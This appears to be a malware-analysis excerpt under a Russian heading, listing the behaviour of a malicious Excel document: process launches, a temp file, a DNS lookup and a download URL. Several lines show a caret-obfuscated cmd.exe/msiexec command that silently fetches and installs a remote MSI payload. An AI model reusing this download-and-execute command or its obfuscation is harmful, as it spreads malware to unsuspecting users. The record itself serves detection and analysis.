Техническая информация
- '<SYSTEM32>\cmd.exe' /C ms^iE^x^ec /i http://ho#####ji-6602.itigo.jp/files/misdrawnda.msi /qn
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\content.word\~wrf{ca2c5fa6-7ff8-481c-b898-3333d4d5b548}.tmp
- http://ho#####ji-6602.itigo.jp/files/misdrawnda.msi
- DNS ASK ho#####ji-6602.itigo.jp
- '<SYSTEM32>\cmd.exe' /C ms^iE^x^ec /i http://ho#####ji-6602.itigo.jp/files/misdrawnda.msi /qn' (со скрытым окном)
- '%ProgramFiles%\microsoft office\office14\excel.exe' -Embedding
- '<SYSTEM32>\msiexec.exe' /i http://ho#####ji-6602.itigo.jp/files/misdrawnda.msi /qn
- '%ProgramFiles%\microsoft office\office14\excelcnv.exe' -Embedding